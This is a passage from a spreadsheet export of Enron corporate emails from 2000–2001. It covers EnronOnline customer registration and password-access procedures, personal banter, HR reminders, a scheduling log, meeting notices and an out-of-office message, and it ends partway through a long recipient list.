each country and therefore we should be able to send out the specific PA to _x000D_
each counterparty._x000D_
4. The customer signs the document (Password Application) and returns to _x000D_
Enron. _x000D_
5. Enron dispatches the System Administrator password and login._x000D_
6.  The customer logs in and the immediately is greeted with the ETA (as _x000D_
loaded for the specific counterparty profile which will be based on the _x000D_
country of origin of the customer).  The ETA must be printable and the _x000D_
customer will scroll through the document to the end where he has the choice _x000D_
of either "I accept" or "I do not accept" (with no default on enter).  This _x000D_
ETA must be printable._x000D_
7.   The customer then enters the site and transacts.  If the customer is _x000D_
transacting under a master then the GTC for a particular product will not _x000D_
need to be accepted, if the customer is dealing without a master then any _x000D_
person using the administrator password or any of its subsidiary passwords _x000D_
can accept the GTC (it only needs to be accepted once by any one person under _x000D_
this SA password).  The system will need to be loaded with the information as _x000D_
to whether a counterparty requires GTC or not for each commodity/product type._x000D_
_x000D_
Elena's questions_x000D_
Q:  Will PA be available as well as ETA for viewing and printing in the _x000D_
"House"?  No only in the garden.  PA and ETA for all jurisdictions will be _x000D_
available and printable in the garden (drop down box would be my suggestion)._x000D_
_x000D_
2.  New Customers_x000D_
_x000D_
There are two alternative routes possible._x000D_
_x000D_
Procedure 1: Off Line Registration_x000D_
_x000D_
Potential Customer will e-mail, phone to express their willingness to trade _x000D_
online, i.e. get the ID and Password_x000D_
Enron will mail Registration Pack to the Potential Customer with PA for _x000D_
appropriate jurisdiction._x000D_
Customer will fill in Registration Form, sign PA and mail it back to Enron_x000D_
If the customer is approved for Online Trading by Enron, it will receive the _x000D_
system administrator login and password._x000D_
The customer logs in and the immediately is greeted with the ETA (as loaded _x000D_
for the specific counterparty profile which will be based on the country of _x000D_
origin of the customer).  The ETA must be printable and the customer will _x000D_
scroll through the document to the end where he has the choice of either "I _x000D_
accept" or "I do not accept" (with no default on enter).  This ETA must be _x000D_
printable._x000D_
The customer then enters the site and transacts.The customer is transacting _x000D_
GTCs for all  products and   any person using the administrator password or _x000D_
any of its subsidiary passwords can accept the GTC (it only needs to be _x000D_
accepted once by any one person under this SA password).  _x000D_
_x000D_
_x000D_
Procedure Two:  Partial OnLine Registration_x000D_
Registration Pack including PAs for all jurisdictions will be available in _x000D_
the Garden_x000D_
Customer has to chose (drop down box) which jurisdiction he is in,  print out _x000D_
appropriate Registration Form and PA,  fill in Registration Form, sign PA and _x000D_
mail it to Enron_x000D_
Customer will fill in Registration Form, sign PA and mail it back to Enron_x000D_
If the customer is approved for Online Trading by Enron, it will receive the _x000D_
system administrator login and password._x000D_
The customer logs in and the immediately is greeted with the ETA (as loaded _x000D_
for the specific counterparty profile which will be based on the country of _x000D_
origin of the customer).  The ETA must be printable and the customer will _x000D_
scroll through the document to the end where he has the choice of either "I _x000D_
accept" or "I do not accept" (with no default on enter).  This ETA must be _x000D_
printable._x000D_
The customer then enters the site and transacts.The customer is transacting _x000D_
GTCs for all  products and   any person using the administrator password or _x000D_
any of its subsidiary passwords can accept the GTC (it only needs to be _x000D_
accepted once by any one person under this SA password).  _x000D_
_x000D_
The Registration Form is currently in draft form and I attach below but _x000D_
clearly Janine may want to add more on her side._x000D_
_x000D_
Elena's questions_x000D_
Q:  1) Alternative 1 or 2? Both_x000D_
 2) In the Garden there must be a sentence (to be drafted by CC) to inform _x000D_
potential customers that there request for access may not be granted.  YES - _x000D_
In the  garden there must be a phrase that any access may not be granted and _x000D_
that it is solely on our discretion (this is not just for Read Only its for _x000D_
all applications)_x000D_
 3) Should all ETAs and PAs be available and printable in the Garden? CC _x000D_
prefers them to be available...YES_x000D_
_x000D_
3.  Read Only Customers_x000D_
_x000D_
If a customer / counterparty does not respond by signing our PA and therefore _x000D_
has not access to the site and we are very keen for them to be a trading _x000D_
counterparty over the Internet we want a way of showing them what they are _x000D_
missing.  So we will be sending them a password and login for read only _x000D_
access.  We could also send out to bodies like regulators or brokers etc but _x000D_
that will be up to the traders - any counterparties wanting access like this _x000D_
would apply through th eroute outlined above for new counterparties and we _x000D_
would authorise readonly access.  We will no be advertising read only access _x000D_
as available._x000D_
_x000D_
They will be able to enter the site for a period for time (Enron needs to be _x000D_
capable of setting system limits to the amount of time a _x000D_
customer/counterparty is given read-only access for) unable to transact but _x000D_
view only.  _x000D_
_x000D_
Procedure_x000D_
1.  Either, Enron monitors the list of counterparties having registered _x000D_
against the full counterparty list and notes that specific counterparty has _x000D_
not registered.  The trading desk with primary trading contact with such _x000D_
counterparty is contacted and asked if they would like to offer read only _x000D_
access for a period of time._x000D_
or,   a trader applies to the Online Product Control group for read only _x000D_
access for one of his customers._x000D_
2.  The Product Control Group will issue a password/login which will be time _x000D_
dated (only valid for a certain period)._x000D_
3. The counterparty will login and immediately greeted by a Read Only ETA  - _x000D_
these are to be country specific.  _x000D_
4. The counterparty must accept the Read Only ETA online before entering the _x000D_
site where he has been given READ ONLY access.  _x000D_
5.   Under this scenario there is only one password and no capability of _x000D_
creating any further passwords (not like a system administrator password)._x000D_
6. When the password expires they will need a prompt box indicating how they _x000D_
should register to continue seeing prices._x000D_
_x000D_
Elena's issues_x000D_
1) Should Read Only ETA be printable and where? YES - should be printable _x000D_
when it appears on screen at login (no need for it to be in the garden)_x000D_
2) What limitations will be imposed on the Guest User, i.e. one log in _x000D_
session, limited time etc. - This decision has to be made in order for CC to _x000D_
put an appropriate language into the Read Only ETA. Read Only ETAs for all _x000D_
jurisdictions have to be finalised by July 7th. Needs to be flexible although _x000D_
one password has no capability of creating further passwords, but the period _x000D_
of time they are allowed access will depend on each trader.  Some customers _x000D_
may be allowed in for one day others for one month._x000D_
3) In the Garden there must be a sentence (to be drafted by CC) to inform _x000D_
potential Guest User that his request for Read Only access may not be _x000D_
granted. We will not be advertising this facility and it will therefore not _x000D_
be mentioned in the garden.  The only phrase in the garden refers to _x000D_
customers who apply for a password may not get access (see above)._x000D_
4) Is Read Only ETA accepted online or it should be signed and mailed back to _x000D_
Enron as a hard copy? The latest agreed was that it will be signed off line, _x000D_
but accepting it online should work as well, and seems to be a cleaner _x000D_
way...No this will be signed/clicked online just like the ETAs._x000D_
_x000D_
Mark's comments_x000D_
System administrator will not be a trader as far as the system is concerned. _x000D_
If they are in reality that is none of our concern.  Agreed - we need to _x000D_
change the name of System Administrator to Trader Administrator_x000D_
ETA acceptance process - we have legal confirmation of your comment? I would _x000D_
expect that all users that trade on the system should read and accept it _x000D_
(which I think is where Bob is coming from). Only one person per System _x000D_
Administration Password / Trader Adminstrator password accepts the ETA._x000D_
_x000D_
Guest only users_x000D_
This concept was raised to us for the first time yesterday - and I have some _x000D_
process queries on it. See above._x000D_
How do we separate/ identify the applications? See above._x000D_
What will be the process for upgrading users f they successfully apply for _x000D_
full rights?  They need to receive a notice when their password expires which _x000D_
prompts them to follow the application process._x000D_
_x000D_
2 other queries  -_x000D_
Why do they need an ETA when they will not be allowed to trade _x000D_
electronically? Need a Read Only ETA - see document for further understanding_x000D_
Limitations to be imposed - where is this being coded and who by? There will _x000D_
be a timetable impact. This is not new and therefore isn't_x000D_
_x000D_
Bob's comments_x000D_
_x000D_
1. Existing Enron Customers (approx 2,000)_x000D_
The first person from the customer's company logging Online has to accept _x000D_
ETA. After that ETA has to be available for viewing and printing for all _x000D_
other users._x000D_
The first person logging on will always be the Administrator (to set up his _x000D_
users) so how can a probable non-trading user accept ETAs for his traders?  _x000D_
Probably will be a trader - change the password to TRADER ADMINISTRATOR _x000D_
PASSWORD/ MASTER TRADING PASSWORD_x000D_
_x000D_
3. Unknown Customers (currently not trading with Enron) willing to get _x000D_
Trading Access_x000D_
Alternative 1 most closely mirrors what we're doing for our existing customer _x000D_
base and so the procedures will already be in place for EOL Product Control / _x000D_
System Admin to run this. If the marketing pack mailing method is utilised we _x000D_
cut down on extra effort in a number of areas (marketing pack will be signed _x000D_
off by legal, business processes already there, no extra development effort, _x000D_
single point of reference)._x000D_
The marketing pack is a glossy brochure advertising our site within it there _x000D_
will be the registration form, I think we do both alternatives._x000D_
_x000D_
Tim's comments_x000D_
_x000D_
 The process you have described is as I understood things, except_x000D_
that for Guest Users ( also referred to as Read Only Users - Regulators,_x000D_
Lawyers, Brokers, Potential Traders etc).  As we discussed on Wednesday and_x000D_
as Andrew mentioned yesterday, I understood the process to be as follows:_x000D_
_x000D_
 The Guest will phone or sent e-mail (possibly fill in a form online,_x000D_
that will be automatically e-mailed) to Enron System Administrator._x000D_
Customers will provide info on their name, e-mail address, mailing address,_x000D_
country of incorporation  etc.   If Enron approves the customer as a Guest_x000D_
user, the System Administrator will  e-mail/fax to the Guest the Read Only_x000D_
ETA.  The Guest will execute the Read only ETA in hard copy and return it to_x000D_
Enron (by fax or post).  Enron will then issue a Guest ID and Password.  The_x000D_
Read Only ETA will be available on the website as a reminder to the Guest._x000D_
This will not be in hard copy it will be online, see above we are not going _x000D_
to advertise this read only capability._x000D_
_x000D_
OK?  _x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 10:57:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Something in the Water?</t>
  </si>
  <si>
    <t>the question was "to humans" and" by humans "_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Quenet, Rebecca" &lt;rebecca.quenet@eds.com&gt;@ENRON  _x000D_
Sent:	Friday, October 26, 2001 12:27 PM_x000D_
To:	Quenet, Joe_x000D_
Subject:	RE: Something in the Water?_x000D_
_x000D_
The deadliest period is the 'Sea Wasp'_x000D_
_x000D_
-----Original Message-----_x000D_
From: Joe.Quenet@enron.com [mailto:Joe.Quenet@enron.com]_x000D_
Sent: Friday, October 26, 2001 12:19 PM_x000D_
To: Quenet, Rebecca_x000D_
Subject: RE: Something in the Water?_x000D_
_x000D_
_x000D_
we're busy here......we're on the web searchingh for "the most deadliest_x000D_
animal" we got a few bucks that say's it the hippo, and in the reverse what_x000D_
is the most killed animal? we have money on goldfish......._x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "Quenet, Rebecca" &lt;rebecca.quenet@eds.com&gt;@ENRON_x000D_
   Sent:   Friday, October 26, 2001 12:14 PM_x000D_
   To:     Quenet, Joe_x000D_
   Subject:  RE: Something in the Water?_x000D_
_x000D_
   God, don't break a sweat typing a response... "OK??" I guess you're busy_x000D_
   today... I'll try not to bother you anymore_x000D_
_x000D_
   -----Original Message-----_x000D_
   From: Joe.Quenet@enron.com [mailto:Joe.Quenet@enron.com]_x000D_
   Sent: Friday, October 26, 2001 12:10 PM_x000D_
   To: Quenet, Rebecca_x000D_
   Subject: RE: Something in the Water?_x000D_
_x000D_
_x000D_
   ok...._x000D_
_x000D_
       -----Original Message-----_x000D_
      From:   "Quenet, Rebecca" &lt;rebecca.quenet@eds.com&gt;@ENRON_x000D_
      Sent:   Friday, October 26, 2001 10:59 AM_x000D_
      To:     Quenet, Joe_x000D_
      Subject:  Something in the Water?_x000D_
_x000D_
      Hey,_x000D_
_x000D_
      I just got an email from Linda McKula (we went to her wedding in_x000D_
   Napa);_x000D_
      anyway she was sharing the news that her and Tim are going to be_x000D_
   having_x000D_
      a_x000D_
      baby.  She's about 2 1/2 months preggo right now.  She said things_x000D_
   have_x000D_
      gotton really quiet/slow work wise for them but they are thankful_x000D_
   that_x000D_
      they_x000D_
      still have jobs (for now).  Later._x000D_
_x000D_
      I just found out that I might have to be in a 4 hour mtg today from_x000D_
      11-3; so_x000D_
      let me know what your plans are this afternoon via email.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t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 21:43:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>Update Yourself Now</t>
  </si>
  <si>
    <t xml:space="preserve">Have any of the following changed recently?_x000D_
_x000D_
	Home address or work location_x000D_
	Home or business phone number_x000D_
	Fax number_x000D_
	E-mail address_x000D_
	Your last name_x000D_
_x000D_
_x000D_
If the answer to any of these items is "yes," then go to eHRonline to update your personal record.  That way you won't miss a single piece of Enron mail (news, benefits info, etc.) at home or at the office.  _x000D_
_x000D_
To update your personal record now go to http://ecteur-wwhr1p.enron.co.uk if you work location is London, for all other locations go to http://ehronline.enron.com._x000D_
_x000D_
Remember, only you can make changes to your personal data.  Update yourself now. </t>
  </si>
  <si>
    <t>Sat, 7 Apr 2001 04:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/7/01; HourAhead hour: 12;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/7/01; HourAhead hour: 12;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001040712.txt</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 05:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'craigjb@state.gov'})</t>
  </si>
  <si>
    <t>Re: our meeting in dubai 11-02-00</t>
  </si>
  <si>
    <t>John,_x000D_
_x000D_
Thanks for the email.  I enjoyed my visit to the middle east and our _x000D_
discussion.  I really appreciate your insight.  I am very committed to the _x000D_
project and many of the other opportunities that Rick's team has put together._x000D_
I'll see you in the new year._x000D_
Sincerely,_x000D_
Mike</t>
  </si>
  <si>
    <t>Mon, 26 Mar 2001 01:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maryhelen.martinez@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sara.shackleton@enron.com', 'mark.taylor@enron.com', 'robert.bruce@enron.com', 'carol.clair@enron.com'})</t>
  </si>
  <si>
    <t>Agriculture-related revisions to ISDA documentation</t>
  </si>
  <si>
    <t>The time for the meeting scheduled below has been changed to 10:00a.m. _x000D_
instead of 9:00 a.m.  Please make the necessary adjustments to your _x000D_
calendars. _x000D_
_x000D_
_x000D_
Regards,_x000D_
Mary Helen Martinez_x000D_
EB3858C_x000D_
ext. 5-2459_x000D_
----- Forwarded by MaryHelen Martinez/NA/Enron on 03/26/2001 08:59 AM -----_x000D_
_x000D_
	MaryHelen Martinez_x000D_
	03/23/2001 05:12 PM_x000D_
		 _x000D_
		 To: Robert Bruce/NA/Enron@Enron, Mark Taylor/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: Holly Keiser/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kaye _x000D_
Ellis/HOU/ECT@ECT, Suzanne Adams/HOU/ECT@ECT_x000D_
		 Subject: Agriculture-related revisions to ISDA documentation_x000D_
_x000D_
Please make a note of the meeting referenced above  it is scheduled for _x000D_
Thursday, March 29th, at 9:00 a.m. in Mark Taylor's office EB3892._x000D_
_x000D_
If the date and time are conflicting with your schedule, please let me know _x000D_
so that I can make the necessary adjustments._x000D_
_x000D_
_x000D_
Regards,_x000D_
Mary Helen Martinez_x000D_
EB3858C_x000D_
ext. 5-2459</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 07:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michelle.lawless@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tracy.carter@enron.com', 'randy.young@enron.com', 'janet.place@enron.com', 'david.grant@enron.com', 'robert.vote@enron.com', 'charles.cheek@enron.com', 'elizabeth.labanowski@enron.com', 'jim.armogida@enron.com', 'gay.arnold@enron.com', 'becky.stephens@enron.com', 'rob.walls@enron.com', 'eileen.kisluk@enron.com', 'bruce.lundstrom@enron.com', 'britt.davis@enron.com', 'richard.sanders@enron.com', 'lisa.robichaux@enron.com', 'becky.zikes@enron.com', 'drew.fossum@enron.com', 'molly.sample@enron.com', 'daniel.rogers@enron.com', 'stephanie.harris@enron.com', 'michael.moran@enron.com', 'gail.brownfeld@enron.com', 'mark.haedicke@enron.com', 'deborah.shahmoradi@enron.com', 'walt.zimmerman@enron.com', 'angela.villagomez@enron.com', 'jordan.mintz@enron.com', 'frank.sayre@enron.com', 'al.alexanderson@enron.com', 'michelle.blaine@enron.com', 'rita.bahner@enron.com', 'robert.williams@enron.com', 'kristina.mordaunt@enron.com', 'vicki.sharp@enron.com', 'scott.sefton@enron.com', 'marc.manly@enron.com', 'bonnie.white@enron.com', 'jan.cooley@enron.com', 'john.ale@enron.com', 'kathy.siess@enron.com', 'john.schwartzenburg@enron.com', 'rex.rogers@enron.com', 'ron.johnson@enron.com', 'david.aamodt@enron.com', 'stephen.wallace@enron.com'})</t>
  </si>
  <si>
    <t>Out of the Office - Charles E. Cheek</t>
  </si>
  <si>
    <t xml:space="preserve"> Mr. Cheek will be out of the office from the afternoon of Tuesday, November _x000D_
21, through Sunday, December 10._x000D_
_x000D_
 From Tuesday afternoon, November 21, through Sunday, December 3, he will not _x000D_
be available to receive or reply to either voice mails or emails.  In the _x000D_
event of an emergency or urgent matter, please call me [713-853-6298 (office) _x000D_
or 713-202-0305 (cellular)] or Kathy Siess [713-853-3486 (office) or 713 _x000D_
647-8939 (home)] and we will get in touch with him._x000D_
_x000D_
 On Monday, December 4, through Sunday, December 10, he will be periodically _x000D_
checking both voice mail and email.  Also, he can be reached in Puerto Rico _x000D_
on December 4 through December 8 at 787-397-0567 (cellular) or 787-763-7655 _x000D_
(office)._x000D_
_x000D_
_x000D_
Michelle Lawless_x000D_
Enron Litigation Unit_x000D_
Tel:  (713) 853-6298_x000D_
Fax:  (713) 853-6576</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 04:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'douglas.dunn@enron.com', 'wes.colwell@enron.com', 'jim.schwieger@enron.com', 'edward.ondarza@enron.com', 'steven.schneider@enron.com', 'andrew.kelemen@enron.com', 'scott.neal@enron.com', 'richard.lydecker@enron.com', 'gregory.sharp@enron.com', 'mark.taylor@enron.com', 'colleen.sullivan@enron.com', 'bruce.sukaly@enron.com', 'grant.masson@enron.com', 'rodney.malcolm@enron.com', 'thomas.martin@enron.com', 'jeffery.ader@enron.com', 'jesse.neyman@enron.com', 'joseph.deffner@enron.com', 'greg.hermans@enron.com', 'brad.blesie@enron.com', 'lance.schuler-legal@enron.com', 'william.rome@enron.com', 'george.mcclellan@enron.com', 'brian.redmond@enron.com', 'peggy.hedstrom@enron.com', 'julie.gomez@enron.com', 'jaime.alatorre@enron.com', 'sally.beck@enron.com', 'gary.hickerson@enron.com', 'jere.overdyke@enron.com', 'edward.baughman@enron.com', 'jeff.donahue@enron.com', 'sheila.tweed@enron.com', 'nick.cocavessis@enron.com', 'barbara.gray@enron.com', 'craig.breslau@enron.com', 'david.oxley@enron.com', 'kyle.kitagawa@enron.com', 'mark.haedicke@enron.com', 'stinson.gibner@enron.com', 'jeffrey.shankman@enron.com', 'phillip.allen@enron.com', 'jordan.mintz@enron.com', 'brad.alford@enron.com', 'mike.roberts@enron.com', 'david.parquet@enron.com', 'douglas.clifford@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.pruett@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'michael.mcdonald@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com', 'jake.thomas@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'mark.dobler@enron.com', 'donald.black@enron.com', 'carl.tricoli@enron.com', 'michael.beyer@enron.com', 'jeffrey.hodge@enron.com', 'bob.crane@enron.com', 'cliff.shedd@enron.com', 'craig.fox@enron.com', 'laura.luce@enron.com', 'mike.jakubik@enron.com', 'james.ajello@enron.com', 'timothy.detmering@enron.com', 'raymond.bowen@enron.com', 'brent.price@enron.com', 'james.ducote@enron.com', 'cary.carrabine@enron.com', 'david.howe@enron.com', 'vince.kaminski@enron.com', 'brian.bierbach@enron.com', 'daniel.reck@enron.com', 'mmiller3@enron.com', 'kent.densley@enron.com', 'jesus.melendrez@enron.com', 'billy.lemmons@enron.com', 'vasant.shanbhogue@enron.com', 'ozzie.pagan@enron.com', 'c.thompson@enron.com', 'robert.greer@enron.com', 'bryan.burnett@enron.com', 'ranabir.dutt@enron.com', 'stuart.staley@enron.com', 'jeff.kinneman@enron.com', 'michelle.parks@enron.com', 'greg.blair@enron.com', 'george.carrick@enron.com', 'paul.adair@enron.com', 'fred.lagrasta@enron.com', 'mike.swerzbin@enron.com', 'sheila.knudsen@enron.com', 'michael.bradley@enron.com', 'andrea.reed@enron.com', 'thomas.suffield@enron.com', 'randal.maffett@enron.com', 'christopher.calger@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', 'max.yzaguirre@enron.com', 'w.duran@enron.com', 'gil.muhl@enron.com', 'rob.milnthorp@enron.com', 'greg.wolfe@enron.com'})</t>
  </si>
  <si>
    <t>(Reminder) Update GIS Information</t>
  </si>
  <si>
    <t>Just another friendly reminder.  Thanks to all of you who have entered your _x000D_
data into GIS and those of you who haven't, the deadline is Friday, July 7.  _x000D_
If any of you need help or are having problems, please give me a call at ext _x000D_
3-5275.  Thanks again.  Ted_x000D_
---------------------- Forwarded by Ted C Bland/HOU/ECT on 07/05/2000 11:29 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  David W Delainey                           06/30/2000 09:42 AM_x000D_
	_x000D_
_x000D_
Sent by: Kay Chapman_x000D_
To: Raymond Bowen/HOU/ECT@ECT, Wes Colwell/HOU/ECT@ECT, Janet R _x000D_
Dietrich/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Gary Hickerson/HOU/ECT@ECT, _x000D_
John J Lavorato/Corp/Enron@Enron, George McClellan/HOU/ECT@ECT, Jere C _x000D_
Overdyke/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Colleen Sullivan/HOU/ECT@ECT, Mark E _x000D_
Haedicke/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Julia Murray/HOU/ECT@ECT, _x000D_
Greg Hermans/Corp/Enron@Enron, Paul Adair/Corp/Enron@Enron, Jeffery _x000D_
Ader/HOU/ECT@ECT, James A Ajello/HOU/ECT@ECT, Jaime Alatorre/NA/Enron@Enron, _x000D_
Brad Alford/ECP/HOU/ECT@ECT, Phillip K Allen/HOU/ECT@ECT, John _x000D_
Arnold/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT, Michael J Beyer/HOU/ECT@ECT, _x000D_
Brian Bierbach/DEN/ECT@Enron, Donald M- ECT Origination Black/HOU/ECT@ECT, _x000D_
Greg Blair/Corp/Enron@Enron, Brad Blesie/Corp/Enron@ENRON, Michael W _x000D_
Bradley/HOU/ECT@ECT, Craig Breslau/HOU/ECT@ECT, Christopher F _x000D_
Calger/PDX/ECT@ECT, Cary M Carrabine/Corp/Enron@Enron, George _x000D_
Carrick/HOU/ECT@ECT, Douglas Clifford/Corp/Enron@ENRON, Bob _x000D_
Crane/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, Kent Densley/Corp/Enron@Enron, _x000D_
Timothy J Detmering/HOU/ECT@ECT, W David Duran/HOU/ECT@ECT, Ranabir _x000D_
Dutt/Corp/Enron@Enron, Craig A Fox/HOU/ECT@ECT, Julie A Gomez/HOU/ECT@ECT, _x000D_
David Howe/Corp/Enron@ENRON, Mike Jakubik/HOU/ECT@ECT, Scott _x000D_
Josey/Corp/Enron@ENRON, Jeff Kinneman/HOU/ECT@ECT, Kyle Kitagawa/CAL/ECT@ECT, _x000D_
Fred Lagrasta/HOU/ECT@ECT, Billy Lemmons/Corp/Enron@ENRON, Laura _x000D_
Luce/Corp/Enron@Enron, Richard Lydecker/Corp/Enron@Enron, Randal _x000D_
Maffett/HOU/ECT@ECT, Rodney Malcolm/HOU/ECT@ECT, Michael McDonald/SF/ECT@ECT, _x000D_
Jesus Melendrez/Corp/Enron@Enron, mmiller3@enron.com, Rob _x000D_
Milnthorp/CAL/ECT@ECT, Gil Muhl/Corp/Enron@ENRON, Scott Neal/HOU/ECT@ECT, _x000D_
Edward Ondarza/HOU/ECT@ECT, Michelle Parks/Corp/Enron@Enron, David _x000D_
Parquet/SF/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Steve _x000D_
Pruett/Corp/Enron@Enron, Daniel Reck/HOU/ECT@ECT, Andrea V Reed/HOU/ECT@ECT, _x000D_
Jim Schwieger/HOU/ECT@ECT, Cliff Shedd/NA/Enron@Enron, Hunter S _x000D_
Shively/HOU/ECT@ECT, Stuart Staley/LON/ECT@ECT, Fletcher J Sturm/HOU/ECT@ECT, _x000D_
Thomas M Suffield/Corp/Enron@ENRON, Bruce Sukaly/Corp/Enron@Enron, Jake _x000D_
Thomas/HOU/ECT@ECT, C John Thompson/Corp/Enron@ENRON, Carl _x000D_
Tricoli/Corp/Enron@Enron, Max Yzaguirre/NA/Enron@ENRON, Sally _x000D_
Beck/HOU/ECT@ECT, Nick Cocavessis/Corp/Enron@ENRON, Peggy _x000D_
Hedstrom/CAL/ECT@ECT, Sheila Knudsen/Corp/Enron@ENRON, Jordan _x000D_
Mintz/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, Mike _x000D_
Swerzbin/HOU/ECT@ECT, Alan Aronowitz/HOU/ECT@ECT, Edward D _x000D_
Baughman/HOU/ECT@ECT, Bryan Burnett/HOU/ECT@ECT, James I Ducote/HOU/ECT@ECT, _x000D_
Douglas B Dunn/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT, Barbara N _x000D_
Gray/HOU/ECT@ECT, Robert Greer/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, _x000D_
Andrew Kelemen/HOU/ECT@ECT, Grant Masson/HOU/ECT@ECT, Jesse _x000D_
Neyman/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, Mike A Roberts/HOU/ECT@ECT, _x000D_
William Rome/HOU/ECT@ECT, Lance Schuler-Legal/HOU/ECT@ECT, Vasant _x000D_
Shanbhogue/HOU/ECT@ECT, Gregory L Sharp/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, _x000D_
Sheila Tweed/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, Mark Dobler/NA/Enron@Enron, _x000D_
Thomas A Martin/HOU/ECT@ECT, Steven Schneider/Enron@Gateway_x000D_
cc: Cindy Skinner/HOU/ECT@ECT, Ted C Bland/HOU/ECT@ECT, David W _x000D_
Delainey/HOU/ECT@ECT, Marsha Schiller/HOU/ECT@ECT, Shirley _x000D_
Tijerina/Corp/Enron@ENRON, Christy Chapman/HOU/ECT@ECT, Stella L _x000D_
Ely/HOU/ECT@ECT, Kimberly Hillis/HOU/ECT@ect, Yolanda Ford/HOU/ECT@ECT, Donna _x000D_
Baker/HOU/ECT@ECT, Katherine Benedict/HOU/ECT@ECT, Barbara Lewis/HOU/ECT@ECT, _x000D_
Janette Elbertson/HOU/ECT@ECT, Shirley Crenshaw/HOU/ECT@ECT, Carolyn _x000D_
George/Corp/Enron@ENRON, Kimberly Brown/HOU/ECT@ECT, Claudette _x000D_
Harvey/HOU/ECT@ect, Terrellyn Parker/HOU/ECT@ECT, Maria Elena _x000D_
Mendoza/NA/Enron@Enron, Ina Rangel/HOU/ECT@ECT, Debra Davidson/PDX/ECT@ECT, _x000D_
Jessica A Wentworth/DEN/ECT@Enron, Catherine DuMont/PDX/ECT@ECT, Betty J _x000D_
Coneway/HOU/ECT@ECT, Nicole Mayer/HOU/ECT@ECT, Sherri Carpenter/HOU/ECT@ECT, _x000D_
Susan Fallon/Corp/Enron@ENRON, Tina Rode/HOU/ECT@ECT, Tonai _x000D_
Lehr/Corp/Enron@ENRON, Iris Wong/CAL/ECT@ECT, Rebecca.Young@enron.com, Maxine _x000D_
E Levingston/Corp/Enron@Enron, Lynn Pikofsky/Corp/Enron@ENRON, Luann _x000D_
Mitchell/Corp/Enron@Enron, Ana Alcantara/HOU/ECT@ECT, Deana _x000D_
Fortine/Corp/Enron@ENRON, Deborah J Edison/HOU/ECT@ECT, Lisa _x000D_
Zarsky/HOU/ECT@ECT, Angela McCulloch/CAL/ECT@ECT, Dusty Warren _x000D_
Paez/HOU/ECT@ECT, Cristina Zavala/SF/ECT@ECT, Felicia Doan/HOU/ECT@ECT, Denys _x000D_
Watson/Corp/Enron@ENRON, Angie Collins/HOU/ECT@ECT, Tammie _x000D_
Davis/NA/Enron@Enron, Gerry Taylor/Corp/Enron@ENRON, Lorie Leigh/HOU/ECT@ECT, _x000D_
Airam Arteaga/HOU/ECT@ECT, Tina Tennant/HOU/ECT@ECT, Mollie _x000D_
Gustafson/PDX/ECT@ECT, Pilar Cerezo/NA/Enron@ENRON, Patti _x000D_
Thompson/HOU/ECT@ECT, Leticia Leal/HOU/ECT@ECT, Darlene C _x000D_
Forsyth/HOU/ECT@ECT, Rhonna Palmer/HOU/ECT@ECT, Irena D Hogan/HOU/ECT@ECT, _x000D_
Joya Davis/HOU/ECT@ECT, Erica Braden/HOU/ECT@ECT, Anabel _x000D_
Gutierrez/HOU/ECT@ECT, Jenny Helton/HOU/ECT@ect, Christine _x000D_
Drummond/HOU/ECT@ECT, Kevin G Moore/HOU/ECT@ECT, Dina Snow/Corp/Enron@Enron, _x000D_
Lillian Carroll/HOU/ECT@ECT, Taffy Milligan/HOU/ECT@ECT, Laura _x000D_
Harder/Corp/Enron@Enron, Nancy Hall/HOU/ECT@ECT, Tina Rode/HOU/ECT@ECT, _x000D_
Crystal Blair/HOU/ECT@ECT, Angie Collins/HOU/ECT@ECT, Donna _x000D_
Baker/HOU/ECT@ECT, Melissa Jones/NA/Enron@ENRON, Beth A Ryan/HOU/ECT@ECT, _x000D_
Shirley Crenshaw/HOU/ECT@ECT, Tamara Jae Black/HOU/ECT@ECT, Amy _x000D_
